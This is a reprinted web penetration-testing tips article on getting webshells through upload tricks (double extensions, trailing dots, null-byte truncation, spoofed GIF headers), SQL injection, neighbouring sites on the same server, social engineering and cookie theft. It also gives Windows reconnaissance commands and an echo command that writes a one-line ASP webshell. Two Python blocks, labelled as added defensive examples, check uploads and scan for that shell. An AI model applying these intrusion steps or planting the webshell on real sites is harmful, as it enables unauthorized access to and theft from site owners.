Web Penetration Testing Experience and Skills (full) [reprint]

Source: Internet
Author: User
Tags: ftp connection, open source cms

Compiled by Nuclear'ATK:

Getting a shell through upload vulnerabilities:

1. Upload a file with a server-side script extension directly (asp, asa, jsp, cer, php, aspx, htr, cdx, and so on) and get the shell.
2. Add a space or a few dots after the extension when uploading; there may be surprising results. Example: *.asp followed by a space, or *.asp...
3. Upload with a double extension, for example *.jpg.asa (can be combined with method 2).
4. GIF file header spoofing.
5. Uploading a second file with the same name as an existing one can also work.
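As an added defensive example (not part of the original post), the following Python validator rejects each of the five tricks listed above, plus the null-byte (00) truncation mentioned in tip 8 further down; the allowed image types, their magic bytes, and the script-marker patterns are my assumptions.

```python
import re
import uuid

# Server-side script extensions that must never land in the web root
# (the list from the post: asp, asa, jsp, cer, php, aspx, htr, cdx).
EXEC_EXTS = {"asp", "asa", "jsp", "cer", "php", "aspx", "htr", "cdx"}

# Assumed allow-list: image types and the magic bytes each must begin with.
ALLOWED = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
           "gif": b"GIF8", "png": b"\x89PNG\r\n\x1a\n"}

def canonical_name(filename):
    """Reduce the client's name to what the filesystem would really create."""
    # 00 truncation (tip 8): a C-level API stops at the NUL byte,
    # so judge the name by the part that would actually be written.
    filename = filename.split("\x00", 1)[0]
    # Keep only the basename so "../x.asp" cannot leave the upload folder.
    filename = filename.replace("\\", "/").rsplit("/", 1)[-1]
    # Trick 2: Windows silently drops trailing spaces and dots ("x.asp " -> "x.asp").
    return filename.rstrip(" .").lower()

def check_upload(filename, head):
    """Return (accepted, reason_or_name) for a name and the file's first bytes."""
    name = canonical_name(filename)
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no usable extension"
    exts = parts[1:]
    # Tricks 1 and 3: reject if ANY segment is executable ("x.jpg.asa"),
    # since some servers pick the handler from a non-final segment.
    if any(e in EXEC_EXTS for e in exts):
        return False, "executable extension in " + name
    if len(exts) > 1:
        return False, "multiple extensions in " + name
    ext = exts[0]
    if ext not in ALLOWED:
        return False, "extension not allowed: " + ext
    # Trick 4: a spoofed GIF header passes a naive magic check, so also
    # refuse image data that carries server-side script markers.
    if not head.startswith(ALLOWED[ext]):
        return False, "magic bytes do not match ." + ext
    if re.search(rb"<\?php|<%|<script", head, re.IGNORECASE):
        return False, "script markers inside image data"
    return True, name

def storage_name(accepted_name):
    """Trick 5: never reuse the client's name on disk; a random name defeats
    same-name overwrites and keeps the saved path unguessable."""
    return uuid.uuid4().hex + "." + accepted_name.rsplit(".", 1)[1]
```

In production pass the whole file body, not just the first bytes, to the marker check, and store files outside any directory the web server maps to a script handler.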

Commands and syntax used during intrusion and post-exploitation:

set, systeminfo, ipconfig, ping: use these commands to collect more system information
tasklist /svc: view the PID of each service
netstat -ano, netstat -abnv
fsutil.exe fsinfo drives: list all drive letters
dir d:\*conn*.* /s: find database connection files
telnet 218.25.88.234 3389: test from outside whether this port is open
echo ^<%execute (Request ("cmd"))%^> >>e:\k\x.asp: write a one-line shell into the e:\k\ directory, with the password cmd
type d:\wwwroot\web\k6.asp >d:\wwwroot\123\a.asp: copy k6.asp from d:\wwwroot\web\ to d:\wwwroot\123\ and rename it a.asp
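A detection counterpart, added here and not from the original post: a Python scan of a web root for script files that contain the one-line shell written by the echo command above. The extension set and the sample files are constructed assumptions.

```python
import os
import re
import tempfile

# Extensions the web server would execute; the same set the post lists
# as upload targets, so these are the files worth inspecting first.
SCRIPT_EXTS = {".asp", ".asa", ".cer", ".cdx", ".aspx", ".htr", ".php", ".jsp"}

# The one-line shell from the echo command above, matched loosely: any case,
# optional whitespace, any parameter name, so both
#   <%execute (Request ("cmd"))%>   and   <%Execute(Request("x"))%>   hit.
ONELINER = re.compile(rb"execute\s*\(\s*request\s*\(", re.IGNORECASE)

def scan_webroot(root):
    """Return [(path, line_no)] for script files containing the one-liner."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if os.path.splitext(fn)[1].lower() not in SCRIPT_EXTS:
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    for n, line in enumerate(fh, 1):
                        if ONELINER.search(line):
                            hits.append((path, n))
                            break          # one report per file is enough
            except OSError:
                continue               # unreadable file: skip, don't abort
    return hits

def demo():
    """Build a constructed web root with one planted shell and scan it."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "k"))
    samples = {
        "k/x.asp": b'<%execute (Request ("cmd"))%>\r\n',      # what the echo writes
        "index.asp": b'<% Response.Write("hello") %>\r\n',    # benign page
        "notes.txt": b'<%execute(Request("cmd"))%>',          # not a script extension
    }
    for rel, data in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    return sorted(os.path.relpath(p, root).replace(os.sep, "/")
                  for p, _ in scan_webroot(root))
```

Pair the content match with a check on recently modified files under the web root, since a freshly written x.asp stands out by its timestamp as much as by its contents.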

Sensitive information in the registry:

HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\: MySQL registry location
HKEY_LOCAL_MACHINE\SOFTWARE\hzhost\config\: China Host (hzhost) location
HKEY_LOCAL_MACHINE\SOFTWARE\Cat Soft\Serv-U\: Serv-U location
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber: the 3389 port
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters: the 1433 port
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSFTPSVC\Parameters\Virtual Roots\: the server's FTP paths

Physical paths of the server log files:

Security log: %SystemRoot%\System32\Config\SecEvent.Evt
System log: %SystemRoot%\System32\Config\SysEvent.Evt
Application log: %SystemRoot%\System32\Config\AppEvent.Evt
FTP connection log and HTTP transaction log: %SystemRoot%\System32\LogFiles\; the sub-folders below it hold the FTP and web service logs respectively, with the .log extension
Norton AntiVirus log: C:\Documents and Settings\All Users\Application Data\Symantec

Oldjun, a veteran, writes about his experience breaking into websites:

Below I talk about my personal experience with intrusions. It is not tied to any language and only covers getting a webshell; privilege escalation is not discussed here, and I rarely escalate privileges unless it is really necessary!~

1. Whatever the site and whatever language it is written in, the first thing I do when I want to penetrate it is scan its directories. In the best case I find an upload point and upload the shell directly. Don't laugh: sometimes you spend a long time on a site only to find there was a ready-made upload point all along, and an easy one to guess. This happens mostly on ASP sites.

2. ASP (ASPX) + MSSQL: consider injection first. If the injection runs with db_owner rights you can write the shell directly; if you cannot write, or the web server and database are separated, then guess the data, go through the admin backend, and upload or change the configuration file from there.

3. ASP (ASPX) + Access: there are generally only three ways to get a shell. First, upload from the front end, or inject to reach the backend and upload there; second, inject to reach the backend and change the configuration file; third, inject to reach the backend and back up the database, or, if a database path disclosure shows the database is an .asp or .asa file, write a one-line shell into it directly.

4. PHP + MySQL: generally inject to reach the backend and upload. Occasionally you are lucky enough to have select into outfile, and then use an include; there are local and remote includes, but remote include is not supported in newer PHP versions, so try to upload an image file locally, or write to a log, and then include it. If the PHP program has an open vulnerability, with luck you can write the shell directly.

5. JSP + MySQL: using the database to gain access is basically the same as with PHP, and JSP uploads rarely check the file extension, so as long as there is an injection point and a backend, getting the shell is quite easy. I have not met many JSP + Oracle sites; on the ones I did meet, I guessed the username and password and went through the backend.

6. On any large site the main site is generally very secure (or it has already been hit), so generally start from second-level domains: guess some of the main site's usernames and passwords, or get the main site's source code, or use a neighbouring site on the same server to reach a server on the same network segment and then use Cain or ARP.

7. Ordinary sites rarely use an existing CMS, so if you are lucky enough to find the source code, you are set: injection vulnerabilities, upload vulnerabilities, file-write vulnerabilities are all in your hands. Also look at the newly launched test sub-sites of the big sites; they are still being tested and you can win them easily.

8. Uploads have file-name truncation, of two kinds: 00 (null-byte) truncation and long file-name truncation (I once used this to get HW). Many places that write files can also be truncated with 00; keep it in mind at all times. When uploading, don't forget the magic of directories named .asp (and of course .asa, .cer, .cdx).

9. PHP sites, whether on Windows or Linux, have the MAGIC_QUOTES_GPC problem. When MAGIC_QUOTES_GPC is on, injection through server variables can still do select into outfile; this year I worked on a closed-source CMS where that was the case. In general don't count on writing files, but if you have that permission don't forget to read file source, because the parameter of load_file can be encoded.

10. Guessing paths or files is necessary in an intrusion. When guessing paths don't forget Google (Baidu is too poor, Google is thorough); also consider the site's Robot.txt or robots.txt, there may be surprises.

11. Tools are very important; scanning with WVS before the intrusion helps. There are many injection tools, but they do not cover everything, and hardware and software firewalls and anti-injection are more and more common now, so don't be lazy: more manual work helps you grow.

12. I have met first-class monitoring and other kinds of firewalls; sometimes the big shell cannot be uploaded through the one-liner. Then learn to encode and learn to work around it.

13. If you want to go after an ordinary site, remember to check the site's copyright notice, find the company that built it, then go after that company's other sites, get the source code and come back. I used this method to win a well-known pharmaceutical company's site.

14. The idea of the neighbouring site on the same server is never outdated. If you meet db_owner injection, you can comfortably write the shell to the site you need and save the trouble of privilege escalation; with bad luck, go step by step with the shell to get what you need.

15. Never forget social engineering: put yourself in the other person's place and work from QQ numbers, ID card numbers, mailboxes and so on; sometimes there are happy accidents. And don't forget the simple attempts admin/admin, test/test, 123456/123456; of course you can also brute force.

16. Don't neglect XSS, and don't neglect cookies. XSS can steal cookies and has a number of other magical uses; learn to understand them. Cookies can be forged, cookies can be injected, and cookie injection gets around the vast majority of firewalls.

17. When working on sites, collect paths, source code and tools to enrich your "arsenal"; it is best to record your intrusion steps for later reflection. I generally note them in a txt file, and also draw inferences from them.

18. Study more, read source code, read published 0days. Scripting is the premise of intrusion, not tools; only knowing how to use tools to show off means you have not even got started.
